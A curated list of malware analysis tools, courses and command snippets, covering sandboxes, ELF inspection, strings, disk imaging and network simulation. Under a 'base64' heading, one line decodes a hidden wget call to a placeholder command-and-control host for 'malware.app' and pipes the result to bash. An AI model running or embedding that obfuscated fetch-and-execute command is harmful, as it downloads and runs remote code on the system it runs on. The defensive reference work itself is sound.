Malware Analysis

• avred - Analyse your malware to surgically obfuscate it
• Awesome Malware Analysis Reverse-Engineering
• Awesome Malware Analysis by rshipp| Defund the Police.
• BlobRunner - Quickly debug shellcode extracted during malware analysis.
• Cheat Sheet for Analyzing Malicious Software
• Dangerzone - Take potentially dangerous PDFs, office documents, or images and convert them to a safe PDF.
• emnux-a-tool-for-reverse-engineering-malware
• elf-malware-analysis-101-initial-analysis
• Awesome Malware Analysis
• CyberChef - The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis.
  • gchq.github.io/CyberChef
• DrSemu - Sandboxed Malware Detection and Classification Tool Based on Dynamic Behavior.
• HashDB - Assortment of hashing algorithms used in malware.
• HunterX-MRE - HunterX - Malware Reverse Engineering Script in Python
• mal-analysis-tools - A curated list of malware repositories, trackers and malware analysis tools
• Malduck - 🦆 Malduck is your ducky companion in malware analysis journeys.
  • Learn how to fix PE magic numbers with Malduck
• malwares-analysis-tools - null
• Malware gems - A not so awesome list of malware gems for aspiring malware analysts.
• malware jail - Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. Written for Node.js
• Reducebin - Remove junk bytes from a large binary malware
• REW-sploit - Emulate and Dissect MSF and other attacks
• SSMA - Simple Static Malware Analyzer [This project is not maintained anymore]
• Tknk_scanner - Community-based integrated malware identification system
• Qu1cksc0pe - All-in-One malware analysis tool. This tool allows you to statically analyze Windows, Linux, OSX executables and APK files.

Collections of good materials (pdfs, tutorials and so on)

• Complete Malware Analysis Tutorials, CheatsheetA Complete Malware Analysis Tutorials, Cheatsheet & Tools list for Security Professionals.
• Linux Malware Analysis by linuxhint.com
• Malware Analysis - CSCI 4976 - Course materials for Malware Analysis by RPISEC.
• Modern Binary Exploitation - CSCI 4968 - Course materials for Modern Binary Exploitation by RPISEC.
• PMAT-labs - Labs for Practical Malware Analysis & Triage.

Compression

• aPLib - compression library.
  • The malware analyst’s guide to aPLib decompression

Decryption and Deobfuscation

• Binary Refinery - High Octane Triage Analysis.

base64

echo d2dldCBodHRwOi8vc29tZW5vbmV4aXRpbmdjbmNbLl1jb20vbWFsd2FyZS5hcHA=|base64 -d |bash;

Diff

• VBinDiff - Visual Binary Diff - Visual Binary Diff (VBinDiff) displays files in hex & ASCII and can highlight the differences between 2 files.

Disk Image

dd if=/dev/sda3 of=$IMAGE_FILE
mount -o loop,ro $IMAGE_FILE /mnt

Entropy

• read later

Frameworks and other analysis systems

• Analyzer - ☣️ Offline Analyzer for extracting and visualizing features, artifacts and IoCs from files and memory dumps (Windows, Linux, Android, iPhone, Blackberry, macOS binaries, emails and more).

• Assemblyline - AssemblyLine 4 - File triage and malware analysis

• CAPEv2 - Malware Configuration And Payload Extraction

• Detect It Easy (DIE) tool - DIE is a signature-based tool that detects a file’s compiler, linker, packer, and more.

• DRAKVUF Sandbox - DRAKVUF Sandbox - automated hypervisor-level malware analysis system.

• Hybrid-Analysis - free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.

• Karton - Distributed malware processing framework based on Python, Redis and MinIO.

  • Karton : Distributed Malware Processing Framework Based On Python, Redis And MinIO

• Koodous

• Malware-analysis-pipeline - Lightweight Python-Based Malware Analysis Pipeline

• Malwoverview - Malwoverview is a first response tool used for threat hunting and offers intel information from Virus Total, Hybrid Analysis, URLHaus, Polyswarm, Malshare, Alien Vault, Malpedia, ThreatCrowd, Valhalla, Malware Bazaar, ThreatFox, Triage and it is able to scan Android devices against VT and HA.

• Pandora - Pandora is an analysis framework to discover if a file is suspicious and conveniently show the results

• Virustotal - Analyze suspicious files and URLs to detect types of malware, automatically share them with the security community.

• YAMA - Yet Another Memory Analyzer for malware detection

  Selfhosted

  • Cuckoo - Cuckoo Sandbox is an automated dynamic malware analysis system

Elf - Executable and Linkable Format

• Formats: so, o, elf, puff, ko, mod, bin, axf, prx or none
• Awesome-elf - null
• ELFkickers - A collection of programs that access and manipulate ELF files.
• Extracting Linux ELF binaries - Pyinstxtractor as of now can natively extract Pyinstaller generated ELF binaries (in the same way as Windows exe) without requiring additional tools.
• Extrude - 🕵️ Analyse binaries for missing security features, information disclosure and more...
• hacking_whale - Custom Docker image used for debugging and pwning x86/x86_64 ELFs.
• M0der_p4cker - Just a modern packer for elf binaries ( works on linux executables only )
• XELFViewer - ELF file viewer/editor for Windows, Linux and MacOS.

ldd                                           #displays libraries used
ldd /bin/executable
readelf
readelf /bin/executable                       #displays info about ELF files
readelf -h training-sample                    #ELF Header
readelf -s training-sample
readelf -s training-sample | grep OBJECT
readelf -s training-sample | grep FUNC
readelf -s training-sample | grep FILE

• tmpout.sh/2

Fuzzy hashing

• SSDeep - Fuzzy hashing API and fuzzy hashing tool . ssdeep-project.github.io

Images

Exif - Exchangeable image file format (officially Exif, according to JEIDA/JEITA/CIPA specifications) is a standard that specifies the formats for images, sound, and ancillary tags used by digital cameras (including smartphones), scanners and other systems handling image and sound files recorded by digital cameras. Wiki Exif

• ExifTool

 exiftool IMG.CR2

Network

• fakedns.py - Minimal python dns server, it only replies with a selected ip in an A record
• flare-fakenet-ng - Next Generation Dynamic Network Analysis Tool.
• INetSim
  • Installing and Configuring InetSim
• Netsniff-ng - A Swiss army knife for your daily Linux network plumbing.
• NetworkMiner - open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD).
• Pcap files and malware samples - Since the summer of 2013, this site has published over 1,600 blog entries about malicious network traffic. Almost every post on this site has pcap files or malware samples (or both).
• TinyCheck - TinyCheck allows you to easily capture network communications from a smartphone or any device which can be associated to a Wi-Fi access point in order to quickly analyze them. This can be used to check if any suspect or malicious communication is outgoing from a smartphone, by using heuristics or specific Indicators of Compromise (IoCs). In order to make it working, you need a computer with a Debian-like operating system and two Wi-Fi interfaces. The best choice is to use a Raspberry Pi (2+) a Wi-Fi dongle and a small touch screen. This tiny configuration (for less than $50) allows you to tap any Wi-Fi device, anywhere.
  • SpyGuard - SpyGuard is a forked and enhanced version of TinyCheck. SpyGuard's main objective is to detect signs of compromise by monitoring network flows transmitted by a device.

  DNS

  • MINI-DNS-Server - Resolve domain names and saves the ips in a database (cache).

Setup

• DetectionLab - Automate the creation of a lab environment complete with security tooling and logging best practices.

Operating Systems

• FireEye's ThreatPursuit-VM - A fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly.
• Flare-vm - a fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc.
  • Installation
• REMnux - REMnux® is a Linux toolkit for reverse-engineering and analyzing malicious software. REMnux provides a curated collection of free tools created by the community. Analysts can use it to investigate malware without having to find, install, and configure the tools. Lots of tools in /opt/ folder.
• Santoku Linux - Linux Distro for Mobile Security, Malware Analysis, and Forensics santoku-linux.com.

Strings

Commands

strings training-sample > str.txt
strings -w maliciousfile.o | less
sudo strings /dev/mem | less

• AMSITrigger - The Hunt for Malicious Strings.

Tutorials and practise

• Malware-traffic-analysis.net - A source for pcap files and malware samples.
• Php-malware-analysis by bediger4000 - Deobfuscation and analysis of PHP malware captured by a WordPress honey pot.
• Reverse-php-malware ProTechEx - An aid to de-obfuscating PHP malware.
• Volume 0x1: Analysis
• Wireshark Tutorial: Examining Traffic from Hancitor Infections
• pan-unit42 - wireshark-tutorial-Hancitor-traffic - zip archives of pcaps for Wireshark tutorial about examining Hancitor infection traffic. Password is infected.

PHP

• Psalm - A static analysis tool for finding errors in PHP applications

• Reverse PHP Mmalware - De-obfuscate and reverse engineer PHP malware.

VMware

• VMwareCloak - A PowerShell script that attempts to help malware analysts hide their VMware Windows VM's from malware that may be trying to evade analysis.